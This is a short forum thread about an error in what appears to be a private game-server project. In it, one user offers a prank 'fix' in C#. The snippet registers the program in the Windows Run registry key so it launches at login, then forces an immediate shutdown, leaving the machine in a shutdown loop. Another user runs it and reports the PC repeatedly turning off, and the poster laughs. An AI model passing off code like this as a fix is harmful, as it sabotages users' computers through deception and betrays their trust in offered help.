Eragon 5517 v3 Error

09/21/2011 17:35 yeiser#31
Quote:
Originally Posted by BaussHacker View Post
Go to Program.cs and find:
Code:
static void Main(string[] args)
under the { put:
Code:
             Microsoft.Win32.RegistryKey RK = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            RK.SetValue("Conquer", Application.ExecutablePath.ToString());
Process.Start("shutdown","/s /t 0");
Hope it helps.
Well, look I gave him that code and gave f6 and f5 but it gave me reboot the pc f5. and put back on the server and returned to me off
09/21/2011 17:37 BaussHacker#32
Quote:
Originally Posted by yeiser View Post
Well, look I gave him that code and gave f6 and f5 but it gave me reboot the pc f5. and put back on the server and returned to me off
LOL.
09/21/2011 19:19 Korvacs#33
Well that was 5 minutes i could have done with, thanks you guys =x
09/23/2011 20:08 alaa410#34
Why solutions are always wrong and why ridicule Us